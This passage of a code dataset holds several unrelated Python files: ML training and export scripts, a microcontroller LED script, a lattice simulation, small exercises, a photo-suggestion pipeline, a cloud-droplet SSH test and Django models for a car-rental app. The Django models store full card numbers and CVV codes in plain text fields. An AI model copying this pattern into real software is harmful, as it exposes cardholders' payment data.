evaluable list\nprint(\"Reading the reference 'image - event' table from the file '\" + referenceFileName + \"'\")\nreferenceList = getData(referenceFileName)\n\nprint(\"Reading the evaluable 'image - event' table from the file '\" + evaluableFileName + \"'\")\nevaluableList = getData(evaluableFileName)\n\nprint(\"\\n\")\nprint(\"Starting to calculate...\")\nresults = evaluate(referenceList, evaluableList, k)\nresults.append(calcAccuracy(referenceList, evaluableList, k))\nmistakes_matches = calcMistakesAndMatches(referenceList, evaluableList, k)\nmistakes = mistakes_matches[0]\nmatches = mistakes_matches[1]\nresults.append(mistakes)\nresults.append(matches)\n\nprint(\"\\n\")\nprint(\"Writing the obtained results in the file '\" + resultsFileName + \"'\")\nwriteResults(resultsFileName)\n\nprint(\"\\n\")\nprintResults()\nprint(\"\\n\")\n\nprint(\"Printing 
graphs...\")\nprint(\"\\n\")\nprintGraphs()\nprint(\"\\n\")\n","repo_name":"jesusmariocalleja/projecte-gdsa-2014","sub_path":"avaluador.py","file_name":"avaluador.py","file_ext":"py","file_size_in_byte":9164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20185285144","text":"#coding=utf-8\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nimport matplotlib.pyplot as plt\nprint('tf version:', tf.__version__)\n\n# Load data\nfashion_mnist = keras.datasets.fashion_mnist\n(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\nprint('train shape:', type(train_images), train_images.shape, train_labels.shape)\nprint('train shape:', type(test_images), test_images.shape, test_labels.shape)\n\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\n# Data normalization, 归一化\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n# conv2D\ntrain_images = train_images[..., tf.newaxis]\ntest_images = test_images[..., tf.newaxis]\n\n# Build network\nmodel = keras.Sequential([\n #keras.layers.Flatten(input_shape=(28, 28)), #28*28=784,没有参数需要学习\n keras.layers.Conv2D(32, 2, activation='relu'),\n keras.layers.Flatten(),\n keras.layers.Dense(128, activation='relu'), #input=784, output=128\n keras.layers.Dense(10, activation='softmax') #input=128, output=10\n])\n\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n# Train\nmodel.fit(train_images, train_labels, batch_size=64, epochs=10)\n\ntest_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\nprint('\\nTest accuracy:', test_acc)\n\n# predict\npredictions = model.predict(test_images)\nprint(np.argmax(predictions[0]), test_labels[0], predictions[0])\n\n","repo_name":"yehongyu/ml_models","sub_path":"tf/cloth_image_classifier.py","file_name":"cloth_image_classifier.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27055644784","text":"import os, sys, io\nimport M5\nfrom M5 import *\nfrom hardware import *\nimport time\n\nrgb = None\ninput_pin = None\nstate = 'red'\n\ndef setup():\n global rgb, input_pin\n\n M5.begin()\n rgb = RGB(io=5, n=30, type = \"WS2812\")\n input_pin = Pin(41, mode=Pin.IN, pull=Pin.PULL_UP)\n \n\n\ndef loop():\n global rgb,state\n M5.update()\n x = input()\n x = str(x)\n time.sleep_ms(10)\n \n if x == \"Open\":\n rgb.set_brightness(100)\n state = 'red'\n elif x == \"Close\":\n rgb.set_brightness(0)\n elif x == \"OK\":\n rgb.set_brightness(100)\n state = 'green'\n \n if (state == 'green'):\n for i in range(100):\n rgb.fill_color(get_color(0,i,0))\n time.sleep_ms(10)\n \n elif(state == 'red'):\n #chase RGB blue:\n for i in range(30):\n rgb.set_color(i, get_color(0,255,230))\n time.sleep_ms(20)\n for i in range(30):\n rgb.set_color(i, get_color(255,158,179))\n time.sleep_ms(20)\n #rgb.fill_color(0xff0000)\n #time.sleep_ms(250)\n \n \ndef get_color(r, g, b):\n rgb_color = (r << 16) | (g << 8) | b\n return rgb_color\n\nprint('color =', hex(get_color(255, 0, 0)))\nprint('color =', hex(get_color(0, 255, 0)))\n\n\nif __name__ == '__main__':\n try:\n setup()\n while True:\n loop()\n except (Exception, KeyboardInterrupt) as e:\n try:\n from utility import print_error_msg\n print_error_msg(e)\n 
except ImportError:\n print(\"please update to latest firmware\")\n \n\n\n\n\n","repo_name":"resistantJs/Yida_Adv_Interactive_Prototype","sub_path":"Assignment4/Final_Final.py","file_name":"Final_Final.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70561892969","text":"# Made by Grufoony\n\nimport random as rnd\nimport time \nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport boltzmann as b\n \nclass board:\n\tdef __init__(self,nrows=5,ncols=5,pocket=5):\n\t\tself.nrows = nrows\n\t\tself.ncols = ncols\n\t\tself.nodes = [pocket for i in range(nrows*ncols)]\n\tdef print(self):\n\t\ti = 0\n\t\tfor element in self.nodes:\n\t\t\tprint(element, end=' ')\n\t\t\ti += 1\n\t\t\tif i == self.ncols:\n\t\t\t\tprint('\\n')\n\t\t\t\ti = 0\n\tdef neighbors(self,pos):\n\t\tneighbors = []\n\t\tif pos % self.ncols == 0: \n\t\t\tneighbors.append(pos + 1)\n\t\telif (pos+1) % self.ncols == 0:\n\t\t\tneighbors.append(pos - 1)\n\t\telse:\n\t\t\tneighbors.append(pos + 1)\n\t\t\tneighbors.append(pos - 1)\n\t\tif pos < self.ncols:\n\t\t\tneighbors.append(pos + self.ncols)\n\t\telif (pos >= self.ncols*(self.nrows - 1)) and (pos < self.ncols*self.nrows):\n\t\t\tneighbors.append(pos - self.ncols)\n\t\telse:\n\t\t\tneighbors.append(pos + self.ncols)\n\t\t\tneighbors.append(pos - self.ncols)\n\t\treturn neighbors\n\tdef evolve(self):\n\t\tfor pos in range(len(self.nodes)):\n\t\t\tneighbour = rnd.choice(self.neighbors(pos))\n\t\t\tif rnd.uniform(0,1) < 0.5:\n\t\t\t\tself.nodes[pos] += 1\n\t\t\t\tif self.nodes[neighbour] > 0:\n\t\t\t\t\tself.nodes[neighbour] -= 1\n\t\t\telse:\n\t\t\t\tif self.nodes[pos] > 0:\n\t\t\t\t\tself.nodes[pos] -= 1\n\t\t\t\tself.nodes[neighbour] += 1\n\tdef data(self):\n\t\tx = np.arange(0, max(self.nodes)+1)\n\t\ty = np.zeros(max(self.nodes)+1)\n\t\tfor element in self.nodes:\n\t\t\ty[element] += 1\n\t\treturn x,y\n\t\t\nmyboard = board(50, 50)\t\n\nfor i in range(99):\n\tstart = time.time_ns()\n\tmyboard.evolve()\t\n\tfinish = time.time_ns()\n\tprint(\"el\",(finish-start)/1000000000)\ndata = myboard.data()\nplt.plot(data[0],data[1])\nplt.show()\n\ncdata = b.simulate(100,100,5) \nplt.plot(cdata[0],cdata[1])\nplt.show()\n","repo_name":"Grufoony/Physics_Unibo","sub_path":"src/Complex_Systems/boltzmann.py","file_name":"boltzmann.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"39727987240","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\nfrom django.contrib.auth.models import Group\nfrom django.contrib.auth.models import Permission\nimport datetime\nfrom django.utils import timezone\nfrom PIL import Image\n\n\nclass AdditionalEquipment(models.Model):\n name = models.CharField(max_length=200)\n\n def __str__(self):\n return self.name\n\n\nclass Engine(models.Model):\n name = models.CharField(max_length=200)\n power = models.FloatField(default=0)\n consummation = models.FloatField(default=0)\n\n def __str__(self):\n return self.name\n\nclass FuelType(models.Model):\n name = models.CharField(max_length=200)\n\n def __str__(self):\n return self.name\n\nclass ModelOfCar(models.Model):\n name = models.CharField(max_length=200)\n modelImg=models.ImageField(upload_to='car_pictures/',default='/static/car/car-default.jpg')\n def __str__(self):\n return self.name\n\nclass Gallery(models.Model):\n userImg = 
models.ImageField(upload_to='car_pictures/', default='NULL')\n\nclass City(models.Model):\n name = models.CharField(max_length=200)\n map_link = models.CharField(max_length=200)\n\n def __str__(self):\n return self.name\n\nclass BankCard(models.Model):\n full_name = models.CharField(max_length=64)\n card_numbers = models.CharField(max_length=16)\n expiration_month = models.CharField(max_length=10, null=True)\n expiration_year = models.CharField(max_length=4, null=True)\n cvv_code = models.CharField(max_length=4)\n country = models.CharField(max_length=200)\n\n def __str__(self):\n return self.full_name\n\n\nclass DriverLicense(models.Model):\n license_picture = models.ImageField(upload_to='license_pictures/', default='NULL')\n\nclass Contact(models.Model):\n full_name = models.CharField(max_length=30)\n email_address = models.EmailField(max_length=30)\n website = models.CharField(max_length=200)\n subject = models.CharField(max_length=200)\n message = models.TextField(max_length=200)\n\n def __str__(self):\n return self.full_name\n\nclass Car(models.Model):\n name = models.CharField(max_length=200)\n model_id = models.ForeignKey(ModelOfCar, on_delete=models.CASCADE, default=1)\n model_year = models.IntegerField()\n price_hourly = models.FloatField()\n available = models.BooleanField()\n rate = models.IntegerField(default=0)\n desciption_text = models.TextField(max_length=1000,default='')\n engine_id = models.ForeignKey(Engine, on_delete=models.CASCADE,default=1)\n fuel_id = models.ForeignKey(FuelType, on_delete=models.CASCADE,default=1)\n picture_id = models.ForeignKey(Gallery, on_delete=models.CASCADE,default=1)\n add_equip_id = models.ForeignKey(AdditionalEquipment, on_delete=models.CASCADE,default=1)\n city_id = models.ForeignKey(City, on_delete=models.CASCADE, default=0)\n start_date = models.DateField('starting date',null=True, blank=True)\n end_date = models.DateField('ending date',null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n ordering=['rate']\n\n\nclass SimpleUser(AbstractUser):\n birth_date = models.DateTimeField('date of birth', null=True, blank=True)\n address = models.CharField(default='NULL',max_length=200)\n userImg = models.ImageField(upload_to='user_avas/', default='user_avas/default.jpg')\n bank_card_id = models.ForeignKey(BankCard, on_delete=models.PROTECT, default=1)\n license_id = models.ForeignKey(DriverLicense, on_delete=models.PROTECT, default=1)\n\n def was_born_date(self):\n return self.birth_date >= timezone.now() - datetime.timedelta(days=1)\n\n def save(self, *args, **kwargs):\n super().save()\n\n img = Image.open(self.userImg.path)\n\n if img.height > 300 or img.width > 300:\n output_size = (300, 300)\n img.thumbnail(output_size)\n img.save(self.userImg.path)\n\n\nclass Order(models.Model):\n car_id = models.ForeignKey(Car, on_delete=models.PROTECT, null=True)\n user_id = models.ForeignKey(SimpleUser, on_delete=models.PROTECT, null=True)\n approves = models.BooleanField(null=True, blank=True, default=True)\n finished = models.BooleanField(null=True, blank=True, default=False)\n canceled = models.BooleanField(null=True, blank=True, default=False)\n total_price = models.IntegerField(default=0)\n rate = models.IntegerField(default=0)\n bank_card_id = models.ForeignKey(BankCard, on_delete=models.PROTECT, default=1)\n license_id = models.ForeignKey(DriverLicense, on_delete=models.PROTECT, default=1)\n email_address = models.EmailField(max_length=30, null=True)\n start_date = models.DateField('starting date',null=True, 
blank=True)\n end_date = models.DateField('ending date',null=True, blank=True)\n","repo_name":"XANALI/nomadRent","sub_path":"ourApp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"17441210874","text":"# Document search\ndef search_index(doc, a, i):\n global num\n for j in range(len(a)):\n if a[j] != doc[i+j]:\n return i+1\n num += 1\n return i+len(a)\n\ndef search_a(doc, a):\n l = len(doc)\n l_a = len(a)\n i = 0\n while i < l:\n if a[0] == doc[i] and (l-i) >= l_a:\n i = search_index(doc, a, i)\n else:\n i += 1\n\ndoc = input()\na = input()\nnum = 0\nsearch_a(doc, a)\nprint(num)\n\n# Another solution\nprint(input().count(input()))","repo_name":"dodoyeon/SW_Academy","sub_path":"greedy/1543_search.py","file_name":"1543_search.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"32772720510","text":"# Suppose you are given a data structure which is a list of dictionaries as follows:\n# cities = [\n# {'Name':'Vancouver','State':'WA','Population':161791},\n# {'Name':'Salem','State':'OR','Population':154637},\n# {'Name':'Seattle','State':'WA','Population':608660},\n# {'Name':'Spokane','State':'WA','Population':208916},\n# ...\n# ]\n\n\n# Complete the function max_in_state to return the city (as a dictionary) \n# with the highest population in a given state. \n# If the population is a tie then return the city that comes first alphabetically.\n\n# If cities contained only the dictionaries above, a call to max_in_state(cities, 'WA') would return:\n# {'Name':'Seattle','State':'WA','Population':608660}\n\n#PF-Prac-39\ndef max_populated_state(cities_dict, state):\n #start writing your code here\n max_populated_city = cities_dict[0]\n for i in cities_dict:\n if i['State'] == state:\n if max_populated_city['State']!=state:\n max_populated_city = i\n else:\n if max_populated_city['Population']<=i['Population']:\n if max_populated_city['Population'] == i['Population']:\n max_populated_city = i if i['Name']<max_populated_city['Name'] else max_populated_city\n else:\n max_populated_city = i\n \n return max_populated_city\n\n\ncities_dict = [\n {'Name': 'Vancouver', 'State': 'WA', 'Population': 161791},\n {'Name': 'Salem', 'State': 'OR', 'Population': 154637},\n {'Name': 'Seattle', 'State': 'WA', 'Population': 80885},\n {'Name': 'Bellingham', 'State': 'WA', 'Population': 608660},\n {'Name': 'Spokane', 'State': 'WA', 'Population': 208916},\n {'Name': 'Bellevue', 'State': 'WA', 'Population': 608660},\n {'Name': 'Portland', 'State': 'OR', 'Population': 583776}\n]\nstate = \"WA\"\nprint(\"The city details are:\", cities_dict)\nprint(\"State:\", state)\noutput = max_populated_state(cities_dict, state)\nprint(\"The highest populated city in the given state is:\", output)\n","repo_name":"Pawan459/infytq-pf-day9","sub_path":"medium/Problem_39.py","file_name":"Problem_39.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"17385595022","text":"# CHART FOR THE SPLIKTV LOG\n\n# import pandas to read the log, and bokeh to create the chart\nimport pandas\nfrom bokeh.plotting import figure, save\nfrom bokeh.io import output_file, show\nfrom bokeh.io import curdoc\nfrom bokeh.models import DatetimeTickFormatter\nfrom bokeh.models import WheelZoomTool\nfrom bokeh.models import Range1d\nfrom bokeh.models import HoverTool, ColumnDataSource\n\n# set the column names\nnombre_de_columnas = [\"Fecha\",\"Hora\",\"Estado\",\"Descripcion\"]\n\n# read the log, parsing date and time\ndf = pandas.read_csv(\"log.txt\",\n names = nombre_de_columnas,\n parse_dates = [\"Fecha\",\"Hora\"]\n)\n\n# keep only the successful activations, discard the rest\ndf = df.query('Descripcion == \"activado\"')\n\n# set the X,Y axes\nx = df[\"Fecha\"]\ny = df[\"Hora\"]\n\n# create the figure\nfig = figure(\n sizing_mode=\"stretch_both\", # make it responsive\n tools=\"pan,wheel_zoom,save,reset\" # choose the toolbar buttons to show\n )\n# enable wheel zoom by default (zoom with the mouse wheel)\nfig.toolbar.active_scroll = fig.select_one(WheelZoomTool) \n\n# format the X axis\nfig.xaxis.formatter=DatetimeTickFormatter(\n hours=[\"%d %B %Y\"],\n days=[\"%d %B %Y\"],\n months=[\"%d %B %Y\"],\n years=[\"%d %B %Y\"],\n)\n\n# tilt the X axis labels\nfig.xaxis.major_label_orientation = 3.14/4\n\n# format the Y axis\nfig.yaxis.formatter=DatetimeTickFormatter(\n minutes=[\"%H:%M:%S\"],\n hours=[\"%H:%M:%S\"],\n)\n\n# customize the number of labels on each axis\nfig.xaxis[0].ticker.desired_num_ticks = 15\nfig.yaxis[0].ticker.desired_num_ticks = 15\n\n# set the theme \ntemas = ['caliber','dark_minimal', 'light_minimal']\ncurdoc().theme = temas[1]\n\n\n####### start of tooltip setup for each dot ######\ndf[\"Fecha_string\"]=df[\"Fecha\"].dt.strftime(\"%Y-%m-%d\")\ndf[\"Hora_string\"]=df[\"Hora\"].dt.strftime(\"%H:%M:%S\")\n\ncds = ColumnDataSource(data=dict(\n Fecha=df[\"Fecha\"],\n Hora=df[\"Hora\"],\n Fecha_string=df[\"Fecha_string\"],\n Hora_string=df[\"Hora_string\"]\n))\n\nhover = HoverTool(tooltips=[\n (\"Fecha\", \"@Fecha_string\"),\n (\"Hora\", \"@Hora_string\")\n])\n\nfig.add_tools(hover)\n###### end of tooltip setup ######\n\n\n# draw the points\nfig.circle(x='Fecha', y='Hora',\n source=cds,\n size=7\n)\n\n# export the html\noutput_file(\"spliktv_activacion.html\")\n\n# save the figure\nsave(fig)\n","repo_name":"matichewer/Activate-SplikTv-app","sub_path":"plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"20604247271","text":"import open_clip\nimport glob\nimport os\nimport PIL.Image\nimport tqdm\nimport torch\nimport numpy as np\nfrom torch.utils.data import DataLoader, Dataset\nfrom argparse import ArgumentParser\nfrom open_clip.pretrained import _PRETRAINED\n\nif __name__ == \"__main__\":\n\n parser = ArgumentParser()\n parser.add_argument(\"output_path\", type=str)\n parser.add_argument(\"--image_size\", type=int, default=224)\n parser.add_argument(\"--model_name\", type=str, default=\"ViT-B-32\")\n parser.add_argument(\"--pretrained\", type=str, default=\"laion2b_s34b_b79k\")\n parser.add_argument(\"--device\", type=str, default=\"cuda\")\n args = parser.parse_args()\n\n\n model_clip, _, preprocess = open_clip.create_model_and_transforms(\n args.model_name, \n pretrained=args.pretrained\n )\n\n class ModelWrapper(torch.nn.Module):\n def __init__(self, model):\n super().__init__()\n self.model = model\n\n def forward(self, x):\n return self.model.encode_image(x)\n\n model = ModelWrapper(model_clip)\n model = model.cuda().eval()\n\n data = torch.randn(1, 3, args.image_size, args.image_size).cuda()\n\n torch.onnx.export(\n model,\n (data,),\n args.output_path,\n input_names=['input'],\n output_names=['output'],\n 
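# dynamic_axes below marks which tensor dimensions may vary between runs,\n # so the exported ONNX graph is not pinned to the tracing batch/resolution.\n 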
dynamic_axes={\n 'input': {0: 'batch_size', 2: \"height\", 3: \"width\"},\n 'output': {0: 'batch_size'} # encode_image returns (batch, embed_dim); it has no spatial axes\n }\n )","repo_name":"NVIDIA-AI-IOT/clip-distillation","sub_path":"export_openclip_onnx.py","file_name":"export_openclip_onnx.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"53"}
{"seq_id":"7419220448","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 14 11:08:32 2016\n\n@author: oisin-brogan\n\"\"\"\nimport pandas as pd\nimport os, sys, shutil\nsys.path.append('/Users/oisin-brogan/Code/similar_images')\nfrom generate_hashes import generate_hashes\nfrom process_results import load_dictionary\nfrom read_exif import read_exif\nimport rules\nfrom functools import reduce\n\n###Parameters#### Final version will parse from terminal\nstep_photos_path = '/Users/oisin-brogan/Downloads/step_photos2/'\nc_m_photos_path = '/Users/oisin-brogan/Downloads/moderated_photos/'\nsuggestions_fldr_name = 'suggestions_/'\n\nexif_tag = 'datetime'\n\nhashs = ['puzzle', 'phash', 'dhash', 'whash']\n\npre_processing_rules = [rules.set_up_db_groups,\n rules.dup_removal_by_min_time,\n rules.dup_removal_by_hash_timed]\npre_processing_args = [(),\n (pd.Timedelta(seconds = 70),),\n ('user', 25, pd.Timedelta(minutes = 30), 'phash')]\nmain_rule = rules.three_similar_concurrent\nmain_rule_args = ('user', 40, pd.Timedelta(minutes = 150), 'whash')\npost_processing_rules = [rules.merge_similar_suggestions]\npost_processing_args = [(2,)]\nrules_to_apply = (pre_processing_rules, main_rule, post_processing_rules)\n\n####Prepare data####\n#Load in step photos data\nstep_photos_db = pd.read_csv(step_photos_path + 'db.csv')\nc_m_photos_db = pd.read_csv(c_m_photos_path + 'db.csv')\n\n#Load in classified and moderated photos\n\n#Read EXIF data\nread_exif(exif_tag, step_photos_path, step_photos_path + 'exif_data.txt')\n\ndef read_exif_txt(txt_path):\n datetimes = {}\n with open(txt_path, 'r') as f:\n lines = f.readlines()\n for line in lines:\n if line.startswith('/'):\n key = line.split('//')[1][:-5] #getting just image id\n datetimes[key] = \"\"\n else:\n datetimes[key] = line.split('value ')[1].strip()\n return datetimes\n \ndef add_taken_at(db, txt_path):\n df = db.copy()\n dic = read_exif_txt(txt_path)\n series = pd.Series(dic)\n df = df.set_index('image_id')\n df.loc[:, 'taken_at'] = series\n df = df.reset_index()\n \n return df\n\nstep_photos_db = add_taken_at(step_photos_db, step_photos_path + 'exif_data.txt')\n\n#Convert time strings to datetimes\nstep_photos_db.taken_at = step_photos_db.taken_at.map(rules.convert_exif_to_datetime)\nc_m_photos_db.taken_at = c_m_photos_db.taken_at.map(rules.convert_ckpd_to_datetime)\n\n#Hashes \n#Store step photos in recipe-specific dirs (if not already done so)\nsp_recipes = set(step_photos_db.recipe_id)\nfor recipe_id in sp_recipes:\n recipe_fldr = step_photos_path + 'by_recipe/' + str(recipe_id)\n if not os.path.exists(recipe_fldr):\n print(\"Moving to recipe folder {}\".format(recipe_id))\n os.makedirs(recipe_fldr)\n relevant_photos = step_photos_db[step_photos_db.recipe_id == recipe_id]['image_id'].values\n for image_id in relevant_photos:\n shutil.copyfile(step_photos_path + str(image_id) + '.jpg',\n recipe_fldr + '/' + str(image_id) + '.jpg')\n #else we assume the photos have already been moved - do nothing\n\n#Store c+m photos in user-specific dirs (if not already done so)\ncm_users = set(c_m_photos_db.user_id)\nfor user_id in 
cm_users:\n usr_fldr = c_m_photos_path + 'by_user/' + str(user_id)\n if not os.path.exists(usr_fldr):\n print(\"Moving to user folder {}\".format(user_id))\n os.makedirs(usr_fldr)\n relevant_photos = c_m_photos_db[c_m_photos_db.user_id == user_id]['image_id'].values\n for image_id in relevant_photos:\n shutil.copyfile(c_m_photos_path + str(image_id) + '.jpg',\n usr_fldr + '/' + str(image_id) + '.jpg')\n #else we assume the photos have already been moved - do nothing\n\n\n#Generate required hashes\nfor recipe_id in sp_recipes:\n recipe_fldr = step_photos_path + 'by_recipe/' + str(recipe_id) + '/'\n for h in hashs:\n if not os.path.exists(recipe_fldr + '{}.txt'.format(h)): #Don't repeat work\n generate_hashes(h, recipe_fldr, recipe_fldr + '{}.txt'.format(h))\n\nfor user_id in cm_users:\n usr_fldr = c_m_photos_path + 'by_user/' + str(user_id) + '/'\n for h in hashs:\n if not os.path.exists(usr_fldr + '{}.txt'.format(h)): #Don't repeat work\n generate_hashes(h, usr_fldr, usr_fldr + '{}.txt'.format(h))\n \n####Apply Rule#####\n#Load the asked for rule\n#rule = rules.rule_dict[rule_to_apply]\n#Apply rule with parameters\nc_m_by_user = c_m_photos_db.groupby('user_id')\nsuggestions = c_m_by_user.apply(rules.general_rule_applier, *rules_to_apply,\n pre_args = pre_processing_args,\n main_args = main_rule_args,\n post_args = post_processing_args)\n\n####Performance metrics####\n#Store suggestions\nif not os.path.exists(c_m_photos_path + suggestions_fldr_name):\n os.mkdir(c_m_photos_path + suggestions_fldr_name)\n\ndef create_photo_list(list_of_photos, user_id, counter):\n dst_path = c_m_photos_path + suggestions_fldr_name + '{}/{}/'.format(user_id, counter)\n \n if not os.path.exists(dst_path):\n os.makedirs(dst_path)\n \n #Create text file with the image ids\n with open(dst_path+'image_list.txt', 'w') as f:\n for image in list_of_photos:\n f.write(image + '.jpg\\n')\n\n#Store the suggestions in separate folders\nfor user_id, values in zip(suggestions.index, suggestions.values):\n for i, suggestion in enumerate(values):\n flat_suggestion = reduce(lambda x,y: x+y, suggestion)\n create_photo_list(flat_suggestion, user_id, i)\n \n#Create timeline of suggestions\ndef suggestions_timeline(all_suggestion_folder, cm_db, granularity='D'):\n df = cm_db.copy()\n df = df.set_index('image_id')\n \n all_timelines = []\n \n users_with_suggestions = [os.path.join(all_suggestion_folder,f) for f in \n os.listdir(all_suggestion_folder) if \n os.path.isdir(os.path.join(all_suggestion_folder,f))]\n for user_fldr in users_with_suggestions: \n user_suggestions = [os.path.join(user_fldr,f) for \n f in os.listdir(user_fldr)\n if os.path.isdir(os.path.join(user_fldr ,f))]\n timeline = []\n for suggestion_fldr in user_suggestions:\n #Read txt file of image id\n if os.path.exists(suggestion_fldr + '/image_list.txt'):\n with open(suggestion_fldr + '/image_list.txt', 'r') as f:\n images = [i[:-5] for i in f.readlines()]\n else:\n print(\"Missing image list file in {}\".format(suggestion_fldr))\n continue\n #Take the time of the last photo as the suggestion time\n times = df.loc[images].taken_at\n suggestion_time = max(times)\n# if suggestion_time > dt.datetime(2500,1,1):\n# \n timeline.append(suggestion_time)\n #Convert to pandas Series\n timeline = pd.Series([1]*len(timeline), index = timeline, name=user_fldr.split('/')[-1])\n timeline = timeline.resample(granularity).sum()\n all_timelines.append(timeline)\n \n all_timelines = pd.concat(all_timelines, axis = 1)\n return all_timelines\n \ntimeline = 
suggestions_timeline(c_m_photos_path + suggestions_fldr_name, c_m_photos_db) \n\n####Time to calc precision and recall####\n#Get all manually labelled recipes in c and m photos\ndef parse_label(fldr_path):\n with open(fldr_path + 'label.txt', 'r') as f:\n recipe = f.readline()\n if recipe == 'recipe\\n':\n lines = f.readlines()\n else:\n lines = []\n \n lines = [l.strip() for l in lines]\n indexs = [i for i,v in enumerate(lines) if v.startswith('.')]\n indexs.append(len(lines))\n list_of_recipes = [lines[indexs[i]+1:indexs[i+1]] for i in range(len(indexs)-1)]\n \n return list_of_recipes\n \nall_recipes = {}\n\nfor user_id in cm_users:\n usr_fldr = c_m_photos_path + 'by_user/' + str(user_id) + '/'\n recipes = parse_label(usr_fldr)\n all_recipes[usr_fldr.split('/')[-2]] = recipes\n\ntotal_recipes = sum([len(v) for v in all_recipes.values()])\n\n\n#Eval all our suggestions to see if they were correct\n \nresults = pd.Series(index = suggestions.index)\n#Workaround to allow lists as elements in a pandas Series\nresults.iloc[0] = [[False,False]]\nresults.iloc[0] = []\n#Have to do this to get around apply treating lists as special cases\nfor u_id in results.index:\n results.loc[u_id] = rules.eval_users_suggestions(suggestions[u_id], str(u_id), all_recipes)\nrecipe_finds = results.map(lambda x: [li[0] and li[1] for li in x])\nextra_photos = results.map(lambda x: [li[0] for li in x])\nsuff_cover = results.map(lambda x: [li[1] for li in x])\n\n#Calc some metrics\ntotal_suggestions = recipe_finds.apply(lambda x: len(x) if x else float('nan')).sum()\ntotal_recipe_finds = recipe_finds.apply(lambda x: sum(x) if x else float('nan')).sum()\nprecision = total_recipe_finds/float(total_suggestions)\nrecall = total_recipe_finds/float(total_recipes)","repo_name":"OisinB/step_suggestions","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"24833997996","text":"\n# End-to-end exercising.\n# Exercises:\n# distroImages, makeDroplet, isUp, sshConn, do, put, get,\n# shutdownAllDroplets, myDroplets.\n\nimport time\nimport logging\nimport doUtils\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef test_doUtilsAndSshConn():\n\n log = logging.getLogger('test_doUtilsAndSshConn')\n\n log.info(\"get the id of an image...\")\n ubuntuImages = [img for img in doUtils.distroImages() if img[1] == 'Ubuntu']\n id = ubuntuImages[0][0]\n\n log.info(\"make a droplet VPS, wait for it to come up...\")\n # (Note that network issues could cause this needed first\n # step to fail.)\n dParms = doUtils.makeDroplet(id)\n isUp = doUtils.isUp(dParms['ip address'], nTries=7)\n assert isUp\n\n log.info(\"make an ssh connection to the droplet...\")\n sc = doUtils.SshConn(dParms['ip address'], 'adminutil', keyFname=dParms['pemFilePathname'])\n\n log.info(\"execute a command, get its output...\")\n _, o, _ = sc.do('pwd')\n pwdOut = o.readlines()\n assert pwdOut == ['/home/adminutil\\n']\n\n log.info(\"put a file to the droplet...\")\n with open('_test.txt', 'w') as f:\n print(\"testing testing\", file=f)\n sc.put('_test.txt', '_test2.txt')\n\n log.info(\"check that the new file is there...\")\n _, o, _ = sc.do('ls')\n lsOut = o.readlines()\n assert lsOut == ['_test2.txt\\n']\n\n log.info(\"get a file from the droplet...\")\n sc.get('_test2.txt', '_test2.txt')\n with open('_test2.txt', 'r') as f:\n contents = f.readlines()\n assert contents == ['testing testing\\n']\n\n # Cleanup:\n log.info(\"shut the droplet 
down...\")\n doUtils.shutdownAllDroplets()\n\n log.info(\"and destroy it...\")\n dParms['droplet'].destroy()\n\n log.info(\"check that it's gone...\")\n time.sleep(3)\n ds = doUtils.myDroplets()\n assert dParms['droplet'].id not in ds\n\n log.info(\"DONE\")\n","repo_name":"jjkimball/doUtils","sub_path":"tests/test_doUtilsAndSshConn.py","file_name":"test_doUtilsAndSshConn.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
